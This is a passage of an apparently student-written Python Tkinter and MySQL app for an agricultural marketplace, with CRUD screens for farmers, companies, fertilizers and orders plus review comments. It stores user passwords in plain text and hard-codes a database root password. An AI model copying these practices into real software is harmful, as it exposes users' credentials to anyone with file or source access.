    L2 = tk.Label(root, text='Password', font=('Arial Bold', 15), bg='ivory')
    L2.place(x=150, y=250)
    T2 = tk.Entry(root, width=30, show='*', bd=5)
    T2.place(x=380, y=250)
    L2 = tk.Label(root, text='Confirm Password', font=('Arial Bold', 15),
        bg='ivory')
    L2.place(x=150, y=300)
    T3 = tk.Entry(root, width=30, show='*', bd=5)
    T3.place(x=380, y=300)
    reg_button = Button(root, text='Done', font=('Arial Bold', 15), bg=
        'blue', command=add_pass)
    reg_button.place(x=440, y=400)
def add_pass():
    """Register a new user.

    Verifies that the password (T2) and its confirmation (T3) match, then
    appends 'username=password' to password.txt and moves on to the entity
    page. If the file does not exist yet, it is created.

    NOTE(review): credentials are stored in plain text — consider hashing.
    """
    global root, T1, T2, T3
    if T2.get() != T3.get():
        label = Label(root, text='Incorrect Password. Enter again', font=(
            'times new roman', 20))
        label.place(x=100, y=100)
    else:
        try:
            with open('password.txt', 'r') as f:
                data = f.read()
            with open('password.txt', 'w') as f:
                f.write(data + '\n')
                f.write(T1.get() + '=' + T2.get())
            entity_page()
        # BUG FIX: was a bare `except:` that silently swallowed every error
        # (including programming errors); only a missing file is expected here.
        except FileNotFoundError:
            # First registration: create the password file.
            with open('password.txt', 'w') as f:
                f.write(T1.get() + '=' + T2.get())
            entity_page()
def entity_page():
    """Main menu: one button per entity table (farmer, company, fertilizer, order, payment) plus booking history."""
    global root
    label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
        'ivory')
    label.place(x=0, y=0)
    label = Label(root, text='WELCOME TO AGRI MARKET ', font=(
        'Times new roman', 20), bg='blue')
    label.place(x=200, y=20)
    label = Label(root, text='Choose the Entity ', font=('Times new roman',
        20), bg='white')
    label.place(x=250, y=100)
    # NOTE(review): the local name `Button` shadows tkinter's Button class for
    # the rest of this function; it still works because tk.Button is used.
    Button = tk.Button(root, text='Farmers', font=('Arial', 15), command=farmer
        )
    Button.place(x=100, y=150 + 25)
    Button = tk.Button(root, text='Company', font=('Arial', 15), command=
        company)
    Button.place(x=300, y=150 + 25)
    Button = tk.Button(root, text='Fertilizer', font=('Arial', 15), command
        =fertilizer)
    Button.place(x=500, y=150 + 25)
    Button = tk.Button(root, text='Order', font=('Arial', 15), command=orders)
    Button.place(x=200, y=300 + 25)
    Button = tk.Button(root, text='Payment', font=('Arial', 15), command=
        payment)
    Button.place(x=400, y=300 + 25)
    Button = tk.Button(root, text='GET BOOKING HISTORY', font=('Arial', 15),
        command=history)
    Button.place(x=200, y=400 + 25)
def history():
    """Show this month's payment transactions (stored procedure getMonth) in a Treeview."""
    global root, cur, db
    label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
        'tomato')
    label.place(x=0, y=0)
    # getMonth takes the current month as a zero-padded string, e.g. '07'.
    cur.execute('CALL getMonth(%s);', [datetime.today().strftime('%m')])
    data = cur.fetchall()
    label = Label(root, text='The Transaction History of this month', font=
        ('Arial', 15))
    label.place(x=200, y=20)
    button = Button(root, text='BACK', command=entity_page)
    button.place(x=20, y=20)
    frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')
    frame.place(x=10, y=100, width=750, height=400)
    x_scroll = Scrollbar(frame, orient=HORIZONTAL)
    y_scroll = Scrollbar(frame, orient=VERTICAL)
    table = ttk.Treeview(frame, columns=('trans_id', 'p_f_id', 'p_date',
        'p_amount', 'p_method'), xscrollcommand=x_scroll.set,
        yscrollcommand=y_scroll.set)
    x_scroll.pack(side=BOTTOM, fill=X)
    y_scroll.pack(side=RIGHT, fill=Y)
    x_scroll.config(command=table.xview)
    y_scroll.config(command=table.yview)
    table.heading('trans_id', text='Transaction Id')
    table.heading('p_f_id', text='Farmer Id')
    table.heading('p_date', text='Payment Date')
    table.heading('p_amount', text='Amount')
    table.heading('p_method', text='Payment Method')
    table['show'] = 'headings'
    table.pack()
    if len(data) != 0:
        for row in data:
            table.insert('', END, values=row)
    # NOTE(review): this closes the shared module-level connection, so any DB
    # action after visiting this page will fail — confirm this is intended.
    db.close()
# Module-level MySQL connection and cursor shared by every CRUD page below.
# NOTE(review): credentials are hard-coded — consider moving them to config.
db = mysql.connector.connect(host='localhost', user='root', passwd=
    'bhushi', database='farmer_app')
cur = db.cursor()
<|reserved_special_token_0|>
def view_farmer():
    """Populate a scrollable Treeview with every row of the farmer table."""
    frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')
    frame.place(x=10, y=100, width=750, height=400)
    x_scroll = Scrollbar(frame, orient=HORIZONTAL)
    y_scroll = Scrollbar(frame, orient=VERTICAL)
    table = ttk.Treeview(frame, columns=('f_id', 'f_name', 'f_phone',
        'f_mail', 'f_locality', 'f_address'), xscrollcommand=x_scroll.set,
        yscrollcommand=y_scroll.set)
    x_scroll.pack(side=BOTTOM, fill=X)
    y_scroll.pack(side=RIGHT, fill=Y)
    x_scroll.config(command=table.xview)
    y_scroll.config(command=table.yview)
    table.heading('f_id', text='Farmer Id')
    table.heading('f_name', text='Farmer Name')
    table.heading('f_phone', text='Farmer Phone')
    table.heading('f_mail', text='Farmer Mail')
    table.heading('f_locality', text='Farmer Locality')
    table.heading('f_address', text='Farmer Address')
    table['show'] = 'headings'
    table.column('f_id', width=100)
    table.pack()
    cur.execute('SELECT * FROM farmer;')
    data = cur.fetchall()
    db.commit()
    if len(data) != 0:
        for row in data:
            table.insert('', END, values=row)
<|reserved_special_token_0|>
def insert_farmer():
    """Render the blank farmer insert form (e1..e6); Commit calls insert_farmer_command."""
    global e1, e2, e3, e4, e5, e6
    label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
        'tomato')
    label.place(x=0, y=0)
    label = Label(root, text='Farmer_id', font=('Times new roman', 20), bg=
        'white')
    label.place(x=50, y=10)
    label = Label(root, text='Farmer_name', font=('Times new roman', 20),
        bg='white')
    label.place(x=50, y=60)
    label = Label(root, text='Farmer_phone', font=('Times new roman', 20),
        bg='white')
    label.place(x=50, y=110)
    label = Label(root, text='Farmer_mail', font=('Times new roman', 20),
        bg='white')
    label.place(x=50, y=160)
    label = Label(root, text='Farmer_locality', font=('Times new roman', 20
        ), bg='white')
    label.place(x=50, y=210)
    label = Label(root, text='Farmer_address', font=('Times new roman', 20),
        bg='white')
    label.place(x=50, y=270)
    e1 = Entry(root, width=50)
    e2 = Entry(root, width=50)
    e3 = Entry(root, width=50)
    e4 = Entry(root, width=50)
    e5 = Entry(root, width=50)
    e6 = Entry(root, width=50)
    e1.place(x=350, y=10)
    e2.place(x=350, y=60)
    e3.place(x=350, y=110)
    e4.place(x=350, y=160)
    e5.place(x=350, y=210)
    e6.place(x=350, y=270)
    Button = tk.Button(root, text='Back', font=('Arial', 15), command=farmer)
    Button.place(x=200, y=400)
    Button = tk.Button(root, text='Commit', font=('Arial', 15), command=
        insert_farmer_command)
    Button.place(x=400, y=400)
<|reserved_special_token_0|>
def invalid(page):
    """Show an 'enter valid id' error page; *page* ('farmer' or 'company') selects which re-entry form the button opens."""
    label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
        'tomato')
    label.place(x=0, y=0)
    if page == 'farmer':
        label = Label(root, text='Enter valid farmer_id', font=(
            'Times new roman', 30), bg='white')
        label.place(x=170, y=200)
        button = Button(root, text='Re-enter', font=('Times new roman', 20),
            command=insert_farmer)
        button.place(x=300, y=400)
    elif page == 'company':
        label = Label(root, text='Enter valid company_id', font=(
            'Times new roman', 30), bg='white')
        label.place(x=170, y=200)
        button = Button(root, text='Re-enter', font=('Times new roman', 20),
            command=insert_company)
        button.place(x=300, y=400)
<|reserved_special_token_0|>
def delete_farmer_command():
    """Delete the farmer whose f_id is in e1; on any failure show 'Invalid Entry'."""
    try:
        sql = 'DELETE FROM farmer WHERE f_id=%s;'
        cur.execute(sql, [e1.get()])
        db.commit()
        farmer()
    except:
        l = Label(root, text='Invalid Entry', font=('times new roman', 15))
        l.place(x=100, y=300)
def update_farmer():
    """Prompt for a farmer id to edit; OK loads the record via update()."""
    global e1
    label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
        'tomato')
    label.place(x=0, y=0)
    label = Label(root, text='Farmer Id:', font=('Times new roman', 20), bg
        ='tomato')
    label.place(x=100, y=200)
    e1 = Entry(root, width=50)
    e1.place(x=300, y=200)
    Button = tk.Button(root, text='OK', font=('Arial', 15), command=update)
    Button.place(x=300, y=400)
<|reserved_special_token_0|>
def update_command():
    """Write the edited farmer fields (e2..e6) back for farmer id e1; re-prompt on any failure."""
    try:
        sql = (
            'UPDATE farmer SET f_name=%s,f_phone_no=%s,f_mail=%s,f_locality=%s,f_address=%s WHERE f_id=%s;'
            )
        vals = e2.get(), e3.get(), e4.get(), e5.get(), e6.get(), e1.get()
        # executemany with a one-element list updates the single row.
        cur.executemany(sql, [vals])
        db.commit()
        farmer()
    except:
        update_farmer()
def search_farmer():
    """Prompt for a farmer id; Search shows the record via search()."""
    global e1
    label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
        'tomato')
    label.place(x=0, y=0)
    label = Label(root, text='Farmer Id:', font=('Times new roman', 20), bg
        ='tomato')
    label.place(x=100, y=200)
    e1 = Entry(root, width=50)
    e1.place(x=300, y=200)
    Button = tk.Button(root, text='Back', font=('Arial', 15), command=farmer)
    Button.place(x=200, y=400)
    Button = tk.Button(root, text='Search', font=('Arial', 15), command=search)
    Button.place(x=400, y=400)
def search():
    """Display one farmer record (id taken from e1) as labelled text lines."""
    label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
        'tomato')
    label.place(x=0, y=0)
    try:
        sql = 'SELECT * FROM farmer WHERE f_id=%s;'
        val = [e1.get()]
        cur.execute(sql, val)
        Button = tk.Button(root, text='OK', font=('Arial', 15), command=farmer)
        Button.place(x=300, y=400)
        # Iterating the cursor yields the matching row(s) as tuples.
        for val in cur:
            count = 0
            Y = 50
            names = ['farmer id: ', 'farmer name: ', 'farmer phone: ',
                'farmer mail: ', 'farmer locality: ', 'farmer address: ']
            for i in val:
                label = Label(root, text=names[count] + str(i), font=(
                    'Times new roman', 20), bg='tomato')
                label.place(x=10, y=Y)
                Y += 50
                count += 1
        db.commit()
    except:
        l = Label(root, text='Invalid Farmer Id', font=('times new roman', 15))
        l.place(x=100, y=300)
        search_farmer()
def company():
    """Company page: Back/Insert/Delete/Update/Search buttons plus the table view."""
    global root
    label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
        'tomato')
    label.place(x=0, y=0)
    label = Label(root, text='Company Table', font=('Times new roman', 15),
        bg='white')
    label.place(x=350, y=10)
    Button = tk.Button(root, text='Back', font=('Arial', 15), command=
        entity_page)
    Button.place(x=10, y=50)
    Button = tk.Button(root, text='Insert', font=('Arial', 15), command=
        insert_company)
    Button.place(x=110, y=50)
    Button = tk.Button(root, text='Delete', font=('Arial', 15), command=
        delete_company)
    Button.place(x=210, y=50)
    Button = tk.Button(root, text='Update', font=('Arial', 15), command=
        update_company)
    Button.place(x=310, y=50)
    Button = tk.Button(root, text='Search', font=('Arial', 15), command=
        search_company)
    Button.place(x=410, y=50)
    view_company()
def view_company():
    """Populate a scrollable Treeview with every row of the company table."""
    frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')
    frame.place(x=10, y=100, width=750, height=400)
    x_scroll = Scrollbar(frame, orient=HORIZONTAL)
    y_scroll = Scrollbar(frame, orient=VERTICAL)
    table = ttk.Treeview(frame, columns=('c_id', 'c_name', 'c_address'),
        xscrollcommand=x_scroll.set, yscrollcommand=y_scroll.set)
    x_scroll.pack(side=BOTTOM, fill=X)
    y_scroll.pack(side=RIGHT, fill=Y)
    x_scroll.config(command=table.xview)
    y_scroll.config(command=table.yview)
    table.heading('c_id', text='Company Id')
    table.heading('c_name', text='Company Name')
    table.heading('c_address', text='Company Address')
    table['show'] = 'headings'
    table.column('c_id', width=100)
    table.pack()
    cur.execute('SELECT * FROM company;')
    data = cur.fetchall()
    db.commit()
    if len(data) != 0:
        for row in data:
            table.insert('', END, values=row)
def insert_company():
    """Render the blank company insert form (e1..e3); Commit calls insert_company_command."""
    global e1, e2, e3, e4, e5, e6
    label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
        'tomato')
    label.place(x=0, y=0)
    label = Label(root, text='Company_id', font=('Times new roman', 20), bg
        ='white')
    label.place(x=50, y=10)
    label = Label(root, text='Company_name', font=('Times new roman', 20),
        bg='white')
    label.place(x=50, y=110)
    label = Label(root, text='Company_address', font=('Times new roman', 20
        ), bg='white')
    label.place(x=50, y=210)
    e1 = Entry(root, width=50)
    e2 = Entry(root, width=50)
    e3 = Entry(root, width=50)
    e1.place(x=350, y=10)
    e2.place(x=350, y=110)
    e3.place(x=350, y=210)
    Button = tk.Button(root, text='Back', font=('Arial', 15), command=company)
    Button.place(x=200, y=400)
    Button = tk.Button(root, text='Commit', font=('Arial', 15), command=
        insert_company_command)
    Button.place(x=400, y=400)
def insert_company_command():
    """Insert a company row from e1..e3; ids longer than 3 characters are rejected via invalid()."""
    try:
        if len(e1.get()) > 3:
            invalid('company')
        else:
            sql = 'INSERT INTO company values(%s,%s,%s);'
            vals = e1.get(), e2.get(), e3.get()
            cur.executemany(sql, [vals])
            db.commit()
            company()
    except:
        insert_company()
def delete_company():
    """Prompt for a company id to delete; Commit calls delete_company_command."""
    global e1
    label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
        'tomato')
    label.place(x=0, y=0)
    label = Label(root, text='Company Id:', font=('Times new roman', 20),
        bg='tomato')
    label.place(x=100, y=200)
    e1 = Entry(root, width=50)
    e1.place(x=300, y=200)
    Button = tk.Button(root, text='Back', font=('Arial', 15), command=company)
    Button.place(x=200, y=400)
    Button = tk.Button(root, text='Commit', font=('Arial', 15), command=
        delete_company_command)
    Button.place(x=400, y=400)
def delete_company_command():
    """Delete the company whose c_id is in e1; non-numeric input trips the except and shows 'Invalid Entry'."""
    try:
        sql = 'DELETE FROM company WHERE c_id=%s;'
        cur.execute(sql, [int(e1.get())])
        db.commit()
        company()
    except:
        l = Label(root, text='Invalid Entry', font=('times new roman', 15))
        l.place(x=100, y=300)
<|reserved_special_token_0|>
def update_c():
    """Load the company row keyed by the id in e1 into an editable form (e1..e3); Modify commits via update_command_c."""
    try:
        global e1, e2, e3, e4, e5, e6
        label = Label(root, text=' ' * 800, font=('Times new roman', 500),
            bg='tomato')
        label.place(x=0, y=0)
        sql = 'SELECT * FROM company WHERE c_id=%s;'
        vals = [e1.get()]
        cur.execute(sql, vals)
        label = Label(root, text='Company_id', font=('Times new roman', 20),
            bg='white')
        label.place(x=50, y=10)
        label = Label(root, text='Company_name', font=('Times new roman',
            20), bg='white')
        label.place(x=50, y=110)
        label = Label(root, text='Company_address', font=('Times new roman',
            20), bg='white')
        label.place(x=50, y=210)
        e1 = Entry(root)
        e2 = Entry(root)
        e3 = Entry(root)
        data = cur.fetchall()
        # Pre-fill the entries with the current column values of the row.
        arr = [e1, e2, e3]
        count = 0
        for val in data[0]:
            arr[count].insert(0, val)
            count += 1
        e1.place(x=350, y=10)
        e2.place(x=350, y=110)
        e3.place(x=350, y=210)
        label = Button(root, text='Modify', font=('Times new roman', 20),
            bg='blue', command=update_command_c)
        label.place(x=300, y=400)
    except:
        # NOTE(review): message says 'Farmer_id' on the company page — likely
        # a copy-paste slip; confirm before changing user-facing text.
        l = Label(root, text='Invalid Farmer_id', font=('times new roman', 15))
        l.place(x=100, y=300)
        update_company()
<|reserved_special_token_0|>
def search_company():
    """Prompt for a company id; Search shows the record via search_c()."""
    global e1
    label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
        'tomato')
    label.place(x=0, y=0)
    label = Label(root, text='Company Id:', font=('Times new roman', 20),
        bg='tomato')
    label.place(x=100, y=200)
    e1 = Entry(root, width=50)
    e1.place(x=300, y=200)
    Button = tk.Button(root, text='Back', font=('Arial', 15), command=company)
    Button.place(x=200, y=400)
    Button = tk.Button(root, text='Search', font=('Arial', 15), command=
        search_c)
    Button.place(x=400, y=400)
def search_c():
    """Display one company record (id taken from e1) as labelled text lines."""
    label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
        'tomato')
    label.place(x=0, y=0)
    try:
        sql = 'SELECT * FROM company WHERE c_id=%s;'
        val = [e1.get()]
        cur.execute(sql, val)
        Button = tk.Button(root, text='OK', font=('Arial', 15), command=company
            )
        Button.place(x=300, y=400)
        for val in cur:
            count = 0
            Y = 50
            names = ['company id: ', 'company name: ', 'company address: ']
            for i in val:
                label = Label(root, text=names[count] + str(i), font=(
                    'Times new roman', 20), bg='tomato')
                label.place(x=10, y=Y)
                Y += 50
                count += 1
        db.commit()
    except:
        l = Label(root, text='Invalid Company Id', font=('times new roman', 15)
            )
        l.place(x=100, y=300)
        search_company()
<|reserved_special_token_0|>
def view_fer():
    """Populate a scrollable Treeview with every row of the fertilizer table."""
    frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')
    frame.place(x=10, y=100, width=750, height=400)
    x_scroll = Scrollbar(frame, orient=HORIZONTAL)
    y_scroll = Scrollbar(frame, orient=VERTICAL)
    table = ttk.Treeview(frame, columns=('fe_formula', 'fe_name',
        'fe_content', 'fe_price', 'company_id'), xscrollcommand=x_scroll.
        set, yscrollcommand=y_scroll.set)
    x_scroll.pack(side=BOTTOM, fill=X)
    y_scroll.pack(side=RIGHT, fill=Y)
    x_scroll.config(command=table.xview)
    y_scroll.config(command=table.yview)
    table.heading('fe_formula', text='Fertilizer Formula')
    table.heading('fe_name', text='Fertilizer name')
    table.heading('fe_content', text='Fertilizer content')
    table.heading('fe_price', text='Fertilizer price')
    table.heading('company_id', text='Company_id')
    table['show'] = 'headings'
    table.pack()
    cur.execute('SELECT * FROM fertilizer;')
    data = cur.fetchall()
    db.commit()
    if len(data) != 0:
        for row in data:
            table.insert('', END, values=row)
<|reserved_special_token_0|>
def insert_fer_command():
    """Insert a fertilizer row from e1..e5; re-open the form on failure."""
    try:
        sql = 'INSERT INTO fertilizer values(%s,%s,%s,%s,%s);'
        vals = e1.get(), e2.get(), e3.get(), e4.get(), e5.get()
        cur.executemany(sql, [vals])
        db.commit()
        fertilizer()
    except:
        insert_fer()
def delete_fer():
    """Prompt for a fertilizer formula to delete; Commit calls delete_fer_command."""
    global e1
    label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
        'tomato')
    label.place(x=0, y=0)
    label = Label(root, text='Fertilizer formula:', font=('Times new roman',
        20), bg='tomato')
    label.place(x=100, y=200)
    e1 = Entry(root, width=50)
    e1.place(x=300, y=200)
    Button = tk.Button(root, text='Back', font=('Arial', 15), command=
        fertilizer)
    Button.place(x=200, y=400)
    Button = tk.Button(root, text='Commit', font=('Arial', 15), command=
        delete_fer_command)
    Button.place(x=400, y=400)
def delete_fer_command():
    """Delete the fertilizer whose fe_formula is in e1; show 'Invalid Entry' on failure."""
    try:
        sql = 'DELETE FROM fertilizer WHERE fe_formula=%s;'
        cur.execute(sql, [e1.get()])
        db.commit()
        fertilizer()
    except:
        l = Label(root, text='Invalid Entry', font=('times new roman', 15))
        l.place(x=100, y=300)
def update_fer():
    """Prompt for a fertilizer formula to edit; OK loads the record via update_fe()."""
    global e1
    label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
        'tomato')
    label.place(x=0, y=0)
    label = Label(root, text='Fertlizer formula:', font=('Times new roman',
        20), bg='tomato')
    label.place(x=100, y=200)
    e1 = Entry(root, width=50)
    e1.place(x=300, y=200)
    Button = tk.Button(root, text='OK', font=('Arial', 15), command=update_fe)
    Button.place(x=300, y=400)
def update_fe():
    """Load the fertilizer row keyed by the formula in e1 into an editable
    form (e1..e5); Modify commits via update_command_fe. On any failure,
    show an error and return to the formula prompt.
    """
    try:
        global e1, e2, e3, e4, e5, e6
        label = Label(root, text=' ' * 800, font=('Times new roman', 500),
            bg='tomato')
        label.place(x=0, y=0)
        sql = 'SELECT * FROM fertilizer WHERE fe_formula=%s;'
        vals = [e1.get()]
        cur.execute(sql, vals)
        label = Label(root, text='Fertlizer formula', font=(
            'Times new roman', 20), bg='white')
        label.place(x=50, y=10)
        label = Label(root, text='Fertlizer name', font=('Times new roman',
            20), bg='white')
        label.place(x=50, y=60)
        label = Label(root, text='Fertlizer content', font=(
            'Times new roman', 20), bg='white')
        label.place(x=50, y=110)
        label = Label(root, text='Fertlizer price', font=('Times new roman',
            20), bg='white')
        label.place(x=50, y=160)
        label = Label(root, text='comapny_id', font=('Times new roman', 20),
            bg='white')
        label.place(x=50, y=210)
        e1 = Entry(root)
        e2 = Entry(root)
        e3 = Entry(root)
        e4 = Entry(root)
        e5 = Entry(root)
        data = cur.fetchall()
        # BUG FIX: the list previously ended with the stale global e6 even
        # though only five entries exist here; if e6 was never set elsewhere
        # the NameError was masked by the bare except and the error path fired.
        arr = [e1, e2, e3, e4, e5]
        count = 0
        # Pre-fill the entries with the current column values of the row.
        for val in data[0]:
            arr[count].insert(0, val)
            count += 1
        e1.place(x=350, y=10)
        e2.place(x=350, y=60)
        e3.place(x=350, y=110)
        e4.place(x=350, y=160)
        e5.place(x=350, y=210)
        label = Button(root, text='Modify', font=('Times new roman', 20),
            bg='blue', command=update_command_fe)
        label.place(x=300, y=400)
    except:
        l = Label(root, text='Invalid Farmer_id', font=('times new roman', 15))
        l.place(x=100, y=300)
        update_fer()
<|reserved_special_token_0|>
def search_fer():
    """Prompt for a fertilizer formula; Search shows the record via search_fe()."""
    global e1
    label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
        'tomato')
    label.place(x=0, y=0)
    label = Label(root, text='Fertlizer formula:', font=('Times new roman',
        20), bg='tomato')
    label.place(x=100, y=200)
    e1 = Entry(root, width=50)
    e1.place(x=300, y=200)
    Button = tk.Button(root, text='Back', font=('Arial', 15), command=
        fertilizer)
    Button.place(x=200, y=400)
    Button = tk.Button(root, text='Search', font=('Arial', 15), command=
        search_fe)
    Button.place(x=400, y=400)
def search_fe():
    """Display one fertilizer record (formula taken from e1) as labelled text lines."""
    label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
        'tomato')
    label.place(x=0, y=0)
    try:
        sql = 'SELECT * FROM fertilizer WHERE fe_formula=%s;'
        val = [e1.get()]
        cur.execute(sql, val)
        Button = tk.Button(root, text='OK', font=('Arial', 15), command=
            fertilizer)
        Button.place(x=300, y=400)
        for val in cur:
            count = 0
            Y = 50
            names = ['fertilizer formula: ', 'fertilizer name: ',
                'fertilizer content: ', 'fertilizer price: ', 'company_id: ']
            for i in val:
                label = Label(root, text=names[count] + str(i), font=(
                    'Times new roman', 20), bg='tomato')
                label.place(x=10, y=Y)
                Y += 50
                count += 1
        db.commit()
    except:
        l = Label(root, text='Invalid Fertilizer formula', font=(
            'times new roman', 15))
        l.place(x=100, y=300)
        search_fer()
def orders():
    """Orders page: Back/Insert/Delete/Update/Search buttons plus the table view."""
    global root
    label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
        'tomato')
    label.place(x=0, y=0)
    label = Label(root, text='Orders Table', font=('Times new roman', 15),
        bg='white')
    label.place(x=350, y=10)
    Button = tk.Button(root, text='Back', font=('Arial', 15), command=
        entity_page)
    Button.place(x=10, y=50)
    Button = tk.Button(root, text='Insert', font=('Arial', 15), command=
        insert_ord)
    Button.place(x=110, y=50)
    Button = tk.Button(root, text='Delete', font=('Arial', 15), command=
        delete_ord)
    Button.place(x=210, y=50)
    Button = tk.Button(root, text='Update', font=('Arial', 15), command=
        update_ord)
    Button.place(x=310, y=50)
    Button = tk.Button(root, text='Search', font=('Arial', 15), command=
        search_ord)
    Button.place(x=410, y=50)
    view_ord()
def view_ord():
    """Populate a scrollable Treeview with every row of the orders table."""
    frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')
    frame.place(x=10, y=100, width=750, height=400)
    x_scroll = Scrollbar(frame, orient=HORIZONTAL)
    y_scroll = Scrollbar(frame, orient=VERTICAL)
    table = ttk.Treeview(frame, columns=('or_id', 'or_date', 'or_fid',
        'or_formula', 'or_to'), xscrollcommand=x_scroll.set, yscrollcommand
        =y_scroll.set)
    x_scroll.pack(side=BOTTOM, fill=X)
    y_scroll.pack(side=RIGHT, fill=Y)
    x_scroll.config(command=table.xview)
    y_scroll.config(command=table.yview)
    table.heading('or_id', text='Order Id')
    table.heading('or_date', text='Order Date')
    table.heading('or_fid', text='Ordered Farmer Id')
    table.heading('or_formula', text='Order (item)formula')
    table.heading('or_to', text='Order to')
    table['show'] = 'headings'
    table.pack()
    cur.execute('SELECT * FROM orders;')
    data = cur.fetchall()
    db.commit()
    if len(data) != 0:
        for row in data:
            table.insert('', END, values=row)
<|reserved_special_token_0|>
def insert_ord():
    """Render the blank order insert form (date pre-filled with now); Commit calls insert_ord_command."""
    global e1, e2, e3, e4, e5, e6
    label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
        'tomato')
    label.place(x=0, y=0)
    label = Label(root, text='Order Id', font=('Times new roman', 20), bg=
        'white')
    label.place(x=50, y=10)
    label = Label(root, text='Order date', font=('Times new roman', 20), bg
        ='white')
    label.place(x=50, y=60)
    label = Label(root, text='Order FID', font=('Times new roman', 20), bg=
        'white')
    label.place(x=50, y=110)
    label = Label(root, text='Order formula', font=('Times new roman', 20),
        bg='white')
    label.place(x=50, y=160)
    label = Label(root, text='Order to', font=('Times new roman', 20), bg=
        'white')
    label.place(x=50, y=210)
    e1 = Entry(root, width=50)
    e2 = Entry(root, width=50)
    e3 = Entry(root, width=50)
    e4 = Entry(root, width=50)
    e5 = Entry(root, width=50)
    e1.place(x=350, y=10)
    e2.place(x=350, y=60)
    e2.insert(0, datetime.now())
    e3.place(x=350, y=110)
    e4.place(x=350, y=160)
    e5.place(x=350, y=210)
    Button = tk.Button(root, text='Back', font=('Arial', 15), command=orders)
    Button.place(x=200, y=400)
    Button = tk.Button(root, text='Commit', font=('Arial', 15), command=
        insert_ord_command)
    Button.place(x=400, y=400)
def insert_ord_command():
    """Insert an order row from e1..e5; re-open the form on failure."""
    try:
        sql = 'INSERT INTO orders values(%s,%s,%s,%s,%s);'
        vals = e1.get(), e2.get(), e3.get(), e4.get(), e5.get()
        cur.executemany(sql, [vals])
        db.commit()
        orders()
    except:
        insert_ord()
def delete_ord():
    """Prompt for an order id to delete; Commit calls delete_ord_command."""
    global e1
    label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
        'tomato')
    label.place(x=0, y=0)
    label = Label(root, text='Order Id:', font=('Times new roman', 20), bg=
        'tomato')
    label.place(x=100, y=200)
    e1 = Entry(root, width=50)
    e1.place(x=300, y=200)
    Button = tk.Button(root, text='Back', font=('Arial', 15), command=orders)
    Button.place(x=200, y=400)
    Button = tk.Button(root, text='Commit', font=('Arial', 15), command=
        delete_ord_command)
    Button.place(x=400, y=400)
def delete_ord_command():
    """Delete the order whose or_id is in e1; show 'Invalid Entry' on failure."""
    try:
        sql = 'DELETE FROM orders WHERE or_id=%s;'
        cur.execute(sql, [e1.get()])
        db.commit()
        orders()
    except:
        l = Label(root, text='Invalid Entry', font=('times new roman', 15))
        l.place(x=100, y=300)
<|reserved_special_token_0|>
def update_or():
    """Load the order row keyed by the id in e1 into an editable form
    (e1..e5); Modify commits via update_command_ord. On any failure, show an
    error and return to the order-id prompt.
    """
    try:
        global e1, e2, e3, e4, e5, e6
        label = Label(root, text=' ' * 800, font=('Times new roman', 500),
            bg='tomato')
        label.place(x=0, y=0)
        sql = 'SELECT * FROM orders WHERE or_id=%s;'
        vals = [e1.get()]
        cur.execute(sql, vals)
        label = Label(root, text='Order Id', font=('Times new roman', 20),
            bg='white')
        label.place(x=50, y=10)
        label = Label(root, text='Order Date', font=('Times new roman', 20),
            bg='white')
        label.place(x=50, y=60)
        label = Label(root, text='Order f_id', font=('Times new roman', 20),
            bg='white')
        label.place(x=50, y=110)
        label = Label(root, text='Order formula', font=('Times new roman',
            20), bg='white')
        label.place(x=50, y=160)
        label = Label(root, text='Order to', font=('Times new roman', 20),
            bg='white')
        label.place(x=50, y=210)
        e1 = Entry(root)
        e2 = Entry(root)
        e3 = Entry(root)
        e4 = Entry(root)
        e5 = Entry(root)
        data = cur.fetchall()
        # BUG FIX: the list previously ended with the stale global e6 even
        # though only five entries exist here; if e6 was never set elsewhere
        # the NameError was masked by the bare except and the error path fired.
        arr = [e1, e2, e3, e4, e5]
        count = 0
        # Pre-fill the entries with the current column values of the row.
        for val in data[0]:
            arr[count].insert(0, val)
            count += 1
        e1.place(x=350, y=10)
        e2.place(x=350, y=60)
        e3.place(x=350, y=110)
        e4.place(x=350, y=160)
        e5.place(x=350, y=210)
        label = Button(root, text='Modify', font=('Times new roman', 20),
            bg='blue', command=update_command_ord)
        label.place(x=300, y=400)
    except:
        l = Label(root, text='Invalid Order_id', font=('times new roman', 15))
        l.place(x=100, y=300)
        update_ord()
def update_command_ord():
    """Persist the edited order fields (e2..e5) for the order id in e1, then return to the orders page."""
    sql = (
        'UPDATE orders SET or_date=%s,or_fid=%s,or_formula=%s,or_to=%s WHERE or_id=%s;'
        )
    vals = e2.get(), e3.get(), e4.get(), e5.get(), e1.get()
    # IDIOM FIX: execute() with one parameter tuple replaces the previous
    # executemany(sql, [vals]) round-about for a single-row update.
    cur.execute(sql, vals)
    db.commit()
    orders()
def search_ord():
    """Prompt for an order id; Search shows the record via search_or()."""
    global e1
    label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
        'tomato')
    label.place(x=0, y=0)
    label = Label(root, text='Order Id:', font=('Times new roman', 20), bg=
        'tomato')
    label.place(x=100, y=200)
    e1 = Entry(root, width=50)
    e1.place(x=300, y=200)
    Button = tk.Button(root, text='Back', font=('Arial', 15), command=orders)
    Button.place(x=200, y=400)
    Button = tk.Button(root, text='Search', font=('Arial', 15), command=
        search_or)
    Button.place(x=400, y=400)
def search_or():
